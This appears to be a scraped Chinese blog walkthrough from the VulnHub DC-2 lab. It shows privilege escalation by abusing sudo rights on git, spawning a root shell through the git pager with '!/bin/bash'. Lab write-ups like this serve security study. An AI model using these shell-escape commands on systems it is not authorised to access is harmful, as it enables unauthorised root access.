当前位置: 首页 > news >正文

git提权

news 2025/8/3 0:46:03

实验环境——vulnhub-dc2靶场

git提权

前提:用户可以使用sudo中git权限

查看sudo权限

sudo -l

image-20240119172000450

可以发现git命令存在sudo提权

基于此进行权限提升

方式:

sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!/bin/bash

然后按q退出,再输出sudo git -p help命令,同上输入!/bin/bash

image-20240119172321933

image-20240119172502115

…(img-S18YuqYP-1705661673078)]

image-20240119172527354

http://www.lryc.cn/news/284609.html

相关文章:

  • 实验四 SQL语言
  • 2024年简历石沉大海,别投了,软件测试岗位饱和了....
  • JS执行顺序
  • Vscode 上安装 Compilot
  • Spring集成MyBatis与MyBatis-Plus添加分页插件
  • Windows下载安装vcpkg并使用它来安装第三方库(visualstudio)
  • leetcode-2788按分隔符拆分字符串
  • 使用Ctrl+Alt+T快速打开Windows Terminal终端
  • Redis 消息队列和发布订阅
  • 去掉element-ui的el-table的所有边框+表头+背景颜色
  • 还在手动复制文章吗?教你如何一键将文章从notion同步到WordPress
  • uni-app的学习【第三节】
  • 全自动网页制作系统流星全自动网页生成系统重构版输入网页信息即可制作
  • 云轴科技ZStack位列IDC云系统软件市场教育行业TOP2
  • 从技术大会到面试舞台:程序猿的蜕变之旅!
  • VS2019+QT5.12.12+opencv+pcl1.12.1 显示点云,运行程序报错-无法定位程序输入点于链接库 如何解决?
  • Oracle-java下载、开源/商业许可证(收费、免费说明)、版本发布日志
  • docker安装 mysql 8.0.32
  • OPC UA 开源库编译方法及通过OPC UA连接西门S7-1200 PLC通信并进行数据交换
  • 【数据库学习】ClickHouse(ck)
  • Springboot之策略模式
  • HTTP 协议和 TCP/IP 协议之间有什么区别?
  • 【Effective C++】让自己习惯C++
  • 第十一章 请求响应
  • 【React】脚手架创建项目
  • 力扣70. 爬楼梯(动态规划 Java,C++解法)
  • Wpf 使用 Prism 实战开发Day13
  • 62 C++ 多线程 -- mutex互斥量只能使用一次的问题分析-----以及解决方案递归mutex:recursive_mutex。
  • Chrome Devtools 调试指南
  • 【Qt5】QString的成员函数chop